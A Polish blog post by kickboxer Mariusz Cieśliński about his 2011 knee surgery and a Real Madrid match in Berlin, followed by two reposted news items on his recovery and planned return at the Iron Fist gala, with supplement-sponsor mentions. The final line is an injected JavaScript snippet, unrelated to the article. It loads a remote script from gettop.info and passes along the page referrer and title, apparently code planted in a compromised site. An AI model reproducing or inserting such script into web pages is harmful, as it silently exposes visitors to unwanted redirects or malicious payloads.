Ból i kontuzje są solą sportu

30.07.2011 / Mariusz Cieśliński

Kontuzje są plagą sportowców.Spędzają sen  z powiek zarówno sportowcom jak i ich trenerom.Każdy jednak ma nadzieję,że go ominą.Nie inaczej było ze mną.Przytrafiła mi się kontuzja kolana.

Szczęściem w nieszczęsciu była szybka akcja moich przyjaciół,którzy wzięli sprawy w swoje ręce i po diagnozie z rezonansu magnetycznego wypchali mnie na operację.

Dzień przed operacją miłem okazję w ramach osłody zobaczyć na żywo na stadionie olimpijskim  w Berlinie mecz pomiędzy Realem Madryt vs Hertha Berlin.Galacticos nie mieli problemów,żeby pokonać niżej notowanego rywala,widowisko przednie przy pełnym stadionie-74tys kibiców.

Jestem już po operacji.Leżę w domu,próbuję izometrycznie spinać mięsień czwórgłowy,prostować nogę i mam okazję w wrunkach „bojowych” próbować supli :Collagen i JointXpack-nową formułę.

W szpitalu odwiedził mnie Adam „Jabi” Jabłoński z Trec Team.Dzięki temu wieczór po operacji mi zleciał szybko i na wesoło.Przez Jabiego pozdrowili mnie pozostała ekipa Trec Team za co bardzo dziękuję ,z my wojownicy:

Mariusz Cieśliński już po operacji

29 lipca 2011 Artykuły przez Redakcja Wrocław

Jeden z najbardziej utytułowanych polskich wojowników – Mariusz Cieśliński zdecydował się na odkładaną od dawna operację lewego kolana. Operacja więzadła krzyżowego została przeprowadzona w Szczecinie. – Już jestem w domu – mówi nam Mariusz.

Kolano Mariusza Cieślińskiego po operacji / fot. arch. zawodnika

 

Dla Mariusza to był tydzień pełen wrażeń. W środę na Stadionie Olimpijskim w Berlinie w towarzystwie 74 tysięcy osób oglądał zwycięstwo Realu Madryt nad Herthą Berlin 3:1. – Z Berlina pojechałem na operację, która odbyła się w czwartek, a dzisiaj już jestem w domu – mówi Cieśliński. Teraz zawodnika czeka rehabilitacja.  Powrót planuje na 5 listopada. Wtedy właśnie zamierza powalczyć na gali Iron Fist.

Mariusz Cieśliński na Stadionie Olimpijskim w Berlinie / fot. arch. zawodnika

(deg)

. Z fightsport:

Mariusz Cieśliński po operacji! PDF Email
Piątek, 29. Lipiec 2011 01:02

Jeden z najbardziej utytułowanych polskich zawodników Kickboxingu i Muay Thai Mariusz Cieśliński od dawna zwlekał z operacją kolana przedkładając treningi i starty nad leczenie. Jednak w końcu podjął męską decyzję i położył się na stół chirurgiczny w Szczecinie. Operacja powiodła się a kiepska pogoda tego lata pozwala na spokojną rehabilitację bez żalu straconych letnich dni.
Mariusz jest na wspomaganiu suplementacją firmy Trec Nutrition stąd ufamy, że wszystko pójdzie gładko. Zawodnikowi, życzymy zdrowia i szybkiego powrotu do treningów a także startów, bowiem pierwszy czeka go…w Szczecinie, gdzie 5-go listopada ma zamiar walczyć na gali Iron Fist.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);